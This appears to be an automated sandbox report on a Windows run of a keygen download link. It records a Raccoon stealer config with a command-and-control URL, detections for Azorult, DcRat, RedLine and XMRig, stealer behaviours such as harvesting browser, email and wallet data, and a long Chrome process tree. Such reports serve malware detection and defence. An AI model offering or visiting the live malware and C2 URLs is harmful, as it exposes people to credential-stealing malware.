Analysis

  • max time kernel
    1800s
  • max time network
    1788s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-04-2021 12:53

General

  • Target

    https://keygenit.com/d/879505fab610o2194510.html

  • Sample

    210419-ftya1gkrwn

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 17 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1368
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2368
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2724
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2712
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/879505fab610o2194510.html
          1⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3152
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8349e4f50,0x7ff8349e4f60,0x7ff8349e4f70
            2⤵
              PID:1364
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1504 /prefetch:2
              2⤵
                PID:540
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1848 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1844
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                2⤵
                  PID:2412
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
                  2⤵
                    PID:3588
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
                    2⤵
                      PID:4124
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                      2⤵
                        PID:4212
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
                        2⤵
                          PID:4236
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                          2⤵
                            PID:4256
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                            2⤵
                              PID:4320
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
                              2⤵
                                PID:4792
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3928 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4956
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6072 /prefetch:8
                                2⤵
                                  PID:5044
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:8
                                  2⤵
                                    PID:5072
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6216 /prefetch:8
                                    2⤵
                                      PID:5116
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                      2⤵
                                        PID:4264
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
                                        2⤵
                                          PID:4372
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6396 /prefetch:8
                                          2⤵
                                            PID:4424
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:8
                                            2⤵
                                              PID:4252
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6216 /prefetch:8
                                              2⤵
                                                PID:4632
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:8
                                                2⤵
                                                  PID:4800
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                  2⤵
                                                    PID:4840
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6dc7da890,0x7ff6dc7da8a0,0x7ff6dc7da8b0
                                                      3⤵
                                                        PID:4944
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4972
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:8
                                                      2⤵
                                                        PID:4988
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6548 /prefetch:8
                                                        2⤵
                                                          PID:2888
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
                                                          2⤵
                                                            PID:1032
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4952 /prefetch:8
                                                            2⤵
                                                              PID:804
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4924 /prefetch:8
                                                              2⤵
                                                                PID:2732
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
                                                                2⤵
                                                                  PID:1260
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
                                                                  2⤵
                                                                    PID:5092
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5664 /prefetch:8
                                                                    2⤵
                                                                      PID:4200
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
                                                                      2⤵
                                                                        PID:4500
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:8
                                                                        2⤵
                                                                          PID:4364
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:8
                                                                          2⤵
                                                                            PID:5112
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7004 /prefetch:8
                                                                            2⤵
                                                                              PID:4792
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:8
                                                                              2⤵
                                                                                PID:2448
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
                                                                                2⤵
                                                                                  PID:4932
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7144 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5084
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7268 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5104
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7420 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4824
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5684 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4220
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7676 /prefetch:8
                                                                                          2⤵
                                                                                            PID:5056
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:8
                                                                                            2⤵
                                                                                              PID:3648
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7644 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5100
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7512 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4828
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8088 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5132
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8320 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5144
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8076 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5204
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8460 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5216
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8476 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5276
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5312
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5324
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5444
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:5520
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8128 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5564
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5616
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5728
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3844 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5772
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=768 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5820
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5872
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5908
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5956
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:6004
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:6048
